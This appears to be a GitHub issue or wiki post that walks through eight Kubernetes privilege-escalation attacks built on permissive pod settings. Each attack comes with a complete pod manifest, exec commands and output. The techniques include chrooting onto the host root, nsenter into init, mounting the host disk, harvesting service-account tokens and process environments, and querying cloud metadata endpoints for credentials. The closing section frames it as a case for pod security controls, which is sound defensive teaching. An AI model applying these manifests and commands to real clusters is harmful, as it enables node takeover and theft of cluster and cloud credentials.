-
Notifications
You must be signed in to change notification settings - Fork 0
Description
Let's look at some common and simple ways for privilege escalation using K8s pods. Almost all of these vulnerabilities can be patched using pod security policies.
Prerequisites
- Access to a K8s cluster
- Permissions to create a pod and exec into it
- No
Pod Security Policiesenforcement, either by K8s' native PodSecurityPolicy or by a third-party tool like gatekeeper
Back to Basics
As you might know, pods are nothing but a group of linux processes that are executed using two features of the Linux kernel called: namespaces and cgroups. While namespaces(HostName, PID, File System, Network, IPC) allow us to provide a "view" to the process that hides everything outside of those namespaces, the cgroup limits the resources(cpu, ram, block and network I/O) that the process can use.
Let's get started
K8s generally uses RBAC for authorization. Even in the cases where a user is not allowed to create a pod, there are at least seven other ways for them to create a pod, using the built-in controllers like: Job, CronJob, ReplicationController (it's not very common now-a-days), ReplicaSet, Deployment, DaemonSet and StatefulSet along with countless number of custom-controllers. So, if you are looking for ways to prevent your users from creating pods - look out for all of these different ways your cluster provides for creating them.
For our case, let's assume we have rights to create pod resources and to exec them.
Modes
- privileged - A
privilegedcontainer is given access to all devices on the host. This allows the container nearly all the same access as processes running on the host. This is useful for containers that want to use linux capabilities like manipulating the network stack and accessing devices. hostPIDhostNetworkhostIPChostPath
Attack 1 (Everything Allowed)
You can exec into the pod and mount the host's root filesystem and chroot to it, effectively becoming root on the host running your pod. If it's a control-plane node, you can access secrets directly from the etcd or use credentials of other privileged control plane components.
How
cat <<EOF | kubectl apply -f -
apiVersion: v1
kind: Pod
metadata:
name: everything-allowed
spec:
hostNetwork: true
hostPID: true
hostIPC: true
containers:
- name: everything-allowed
image: ubuntu
securityContext:
privileged: true
volumeMounts:
- mountPath: /host
name: noderoot
command: [ "/bin/sh", "-c", "--" ]
args: [ "while true; do sleep 30; done;" ]
volumes:
- name: noderoot
hostPath:
path: /
EOF
kubectl exec -it everything-allowed -- bash
root@minikube:/ docker ps
bash: docker: command not found
root@minikube:/ chroot host
sh-5.0# docker ps | head -n2
CONTAINER ID IMAGE COMMAND CREATED STATUS PORTS NAMES
f3d3252343be ubuntu "/bin/sh -c -- 'whil…" 2 minutes ago Up 2 minutes k8s_everything-allowed_everything-allowed_default_89e48ca1-97e6-49a5-a51c-325c95a916eb_0Attack 2 (Privileged and HostPID)
privileged breaks down most of the walls that container security provides and with hostPID they can see and enter the namespace of any process running on the host.
How
Let's nsenter to init process's namespace (from there onwards we'll have same access as with Attack 1 (Everything Allowed))
cat << EOF | kubectl apply -f -
apiVersion: v1
kind: Pod
metadata:
name: priv-and-hostpid
spec:
hostPID: true
containers:
- name: priv-and-hostpid
image: ubuntu
tty: true
securityContext:
privileged: true
command: [ "nsenter", "--target", "1", "--mount", "--uts", "--ipc", "--net", "--pid", "--", "bash" ]
EOF
kubectl exec -it priv-and-hostpid -- bash
bash-5.0 docker ps | head -n2
CONTAINER ID IMAGE COMMAND CREATED STATUS PORTS NAMES
c050527a7218 ubuntu "nsenter --target 1 …" 3 minutes ago Up 3 minutes k8s_priv-and-hostpid_priv-and-hostpid_default_267457b6-97c4-4d5f-bcec-d165a425f2fe_0
bash-5.0 cat /var/lib/kubelet/config.yaml
apiVersion: kubelet.config.k8s.io/v1beta1
authentication:
anonymous:
enabled: false
webhook:
cacheTTL: 0s
enabled: true
x509:
clientCAFile: /var/lib/minikube/certs/ca.crt
. . . . . . Attack 3 (Privilege Only)
Like the first attack, in privileged mode access to node's devices is granted which includes the /dev filesystem. This filesystem can be mounted on the pod (this won't give a full view of filesystem as in Attack 1 though)
How
cat <<EOF | kubectl apply -f -
apiVersion: v1
kind: Pod
metadata:
name: priv-pod
spec:
containers:
- name: priv-pod
image: ubuntu
securityContext:
privileged: true
command: [ "/bin/sh", "-c", "--" ]
args: [ "while true; do sleep 30; done;" ]
EOF
minikube ssh
_ _
_ _ ( ) ( )
___ ___ (_) ___ (_)| |/') _ _ | |_ __
/' _ ` _ `\| |/' _ `\| || , < ( ) ( )| '_`\ /'__`\
| ( ) ( ) || || ( ) || || |\`\ | (_) || |_) )( ___/
(_) (_) (_)(_)(_) (_)(_)(_) (_)`\___/'(_,__/'`\____)
$ df
Filesystem 1K-blocks Used Available Use% Mounted on
tmpfs 7345880 638328 6707552 9% /
. . . . . . . . .
tmpfs 4081044 8 4081036 1% /tmp
/dev/vda1 136554284 37411016 91262620 30% /mnt/vda1
. . . . . . . .
kubectl exec -it priv-pod -- bash
root@priv-pod:/ mkdir /tmp/host-fs
root@priv-pod:/ mount /dev/vda1 /tmp/host-fs/
root@priv-pod:/ cd /tmp/host-fs/
root@priv-pod:/tmp/host-fs ls
data hostpath-provisioner hostpath_pv lost+found var
root@priv-pod:/tmp/host-fs ls var/lib/docker/ # also var/lib/kubelet
buildkit containerd containers image network overlay2 plugins runtimes swarm tmp trust volumesAttack 4 (HostPath Only)
If the administrators have not limited what you can mount, you can mount / on the host into your pod, giving you read/write access on the host’s filesystem.
- You can search for
kubeconfigfile and might get cluster-admin config file - Can search for tokens in
/var/lib/kubelet/pods/- look for tokens that might give access to secrets inkube-systemor maybe havecluster-adminrole - Can add your SSH key to the host
How
cat <<EOF | kubectl apply -f -
apiVersion: v1
kind: Pod
metadata:
name: hostpath-pod
spec:
containers:
- name: hostpath
image: ubuntu
volumeMounts:
- mountPath: /host
name: noderoot
command: [ "/bin/sh", "-c", "--" ]
args: [ "while true; do sleep 30; done;" ]
volumes:
- name: noderoot
hostPath:
path: /
EOF
kubectl exec -it hostpath-exec-pod -- bash
root@hostpath-exec-pod:/ cd /host/var/lib/kubelet/pods/
root@hostpath-exec-pod:/host/var/lib/kubelet/pods# cd <pod-id>/volumes/kubernetes.io~secret/default-token-w8dkr/
root@hostpath-exec-pod:/host/var/lib/kubelet/pods/. . .# ls -al
total 4
drwxrwxrwt 3 root root 140 Mar 22 04:31 .
drwxr-xr-x 3 root root 4096 Mar 22 04:31 ..
drwxr-xr-x 2 root root 100 Mar 22 04:31 ..2022_03_22_04_31_55.677028166
lrwxrwxrwx 1 root root 31 Mar 22 04:31 ..data -> ..2022_03_22_04_31_55.677028166
lrwxrwxrwx 1 root root 13 Mar 22 04:31 ca.crt -> ..data/ca.crt
lrwxrwxrwx 1 root root 16 Mar 22 04:31 namespace -> ..data/namespace
lrwxrwxrwx 1 root root 12 Mar 22 04:31 token -> ..data/tokenAttack 5 (HostPID only)
With only hostPID, you can
- View processes on the host – running
pswithin the pod would list all the processes running on the host (including processes on other pods) - View the environment variables for each pod on the host(process UIDs should match) - can read the
/proc/[PID]/environfile for each process running on the host. - View the file descriptors for each pod on the host - can read the
/proc/[PID]/fd[X]for each process running on the host. - Kill processes – can also kill any process on the node (presenting a denial-of-service risk)
You might get lucky and find secrets, token etc in output of ps or in env vars.
How
cat <<EOF | kubectl apply -f -
apiVersion: v1
kind: Pod
metadata:
name: hostpid-pod
spec:
hostPID: true
containers:
- name: hostpid-pod
image: ubuntu
command: [ "/bin/sh", "-c", "--" ]
args: [ "while true; do sleep 30; done;" ]
EOF
kubectl exec -it hostpid-pod -- bash
root@hostpid-pod:/ ps aux
. . . <removed for brevity> . . .
root 5828 0.0 0.1 710940 8512 ? Sl 03:34 0:00 /usr/bin/containerd-shim-runc-v2 -namespace moby -id 25374a04ffcc777d5b0601a3af
root 5849 0.3 0.4 747660 38376 ? Ssl 03:34 0:31 /coredns -conf /etc/coredns/Corefile
root 3348 1.5 0.9 10612728 74544 ? Ssl 03:33 2:17 etcd --advertise-client-urls=https://192.168.64.3:2379 --cert-file=/var/lib/minikube/certs/etcd/server.crt --client-cert-auth=true --data-dir=/var/lib/minikube/etcd --initial-advertise-peer-urls=https://192.168.64.3:2380 --initial-cluster=minikube=https://192.168.64.3:2380 --key-file=/var/lib/minikube/certs/etcd/server.key
. . . . <removed for brevity> . . .
root@hostpid-pod:/ cat /proc/3348/environ
PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/binHOSTNAME=minikubeSSL_CERT_FILE=/etc/ssl/certs/ca-certificates.crtHOME=/rootYou can only get environ for processes which share the same UID as our pod. To read env file of a process with different UID(987 let' say), run the pod with runAsUser specified to be that UID.
Attack 6 (HostNetwork only)
With only HostNetwork set to true, you can't get privileged code execution on the host directly. But, there are still some things you can look for
- Traffic sniffing - You can sniff traffic using tools like
tcpdumpand might some secrets/tokens being sent over unencrypted. - Access services bound to localhost - You can access services listening only on
loopbackaddress. - Bypass network policy - If you set
hostnetwork=true, your pod won't be restricted by a network policy applied to a namespace or pod (because your pod isn't bound to pod networking).
How
cat <<EOF | kubectl apply -f -
apiVersion: v1
kind: Pod
metadata:
name: hostnetwork-pod
spec:
hostNetwork: true
containers:
- name: hostnetwork
image: ubuntu
command: [ "/bin/sh", "-c", "--" ]
args: [ "while true; do sleep 30; done;" ]
EOFAttack 7 (HostIPC only)
Nothing much that can be done here. You'll be able to read/write to same files/mechanisms that other processes use for IPC (ex: /dev/shm). You should check out the other IPC mechanisms with ipcs and see if anything is written there.
How
cat <<EOF | kubectl apply -f -
apiVersion: v1
kind: Pod
metadata:
name: hostipc-pod
spec:
hostIPC: true
containers:
- name: hostipc
image: ubuntu
command: [ "/bin/sh", "-c", "--" ]
args: [ "while true; do sleep 30; done;" ]
EOF
minikube ssh
_ _
_ _ ( ) ( )
___ ___ (_) ___ (_)| |/') _ _ | |_ __
/' _ ` _ `\| |/' _ `\| || , < ( ) ( )| '_`\ /'__`\
| ( ) ( ) || || ( ) || || |\`\ | (_) || |_) )( ___/
(_) (_) (_)(_)(_) (_)(_)(_) (_)`\___/'(_,__/'`\____)
$ echo "secretpassword=usethissecret" > /dev/shm/secretpassword.txt
kubectl exec -it hostipc-pod -- bash
root@hostipc-pod:/ cat /dev/shm/secretpassword.txt
secretpassword=usethissecret
root@hostipc-pod:/ ipcs -a
------ Message Queues --------
key msqid owner perms used-bytes messages
------ Shared Memory Segments --------
key shmid owner perms bytes nattch status
------ Semaphore Arrays --------
key semid owner perms nsemsAttack 8 (Nothing Allowed)
- If nodes are part of cloud env, you can check for
metadataservice (you might find creds for cloud provider)
# AWS
curl http://169.254.169.254/latest/meta-data
curl http://169.254.169.254/latest/meta-data/iam/security-credentials/
# GCP
curl -H "Metadata-Flavor: Google" 'http://metadata/computeMetadata/v1/instance/'
curl -H 'Metadata-Flavor:Google' http://metadata.google.internal/computeMetadata/v1/instance/service-accounts/default/
# Azure
curl -H Metadata:true "http://169.254.169.254/metadata/instance
curl -H Metadata:true "http://169.254.169.254/metadata/identity/oauth2/token- Overly permissive service account: By default the
defaultSA of a namespace is mounted to a pod. If that SA is overly permissive, you can use that to further escalate your permissions in the cluster.
Conclusion
I just wanted to show how easy it is to gain unauthorized access to the underlying nodes or the cluster-itself in the absence of proper security checks.
All of the above attacks (except in Attack 8) can be mitigated by using PodSecurityPolicies. As of K8s 1.21, PodSecurityPolicy is deprecated and instead PodSecurityAdmisson (as of K8s 1.23 they are in beta state) controllers should be used.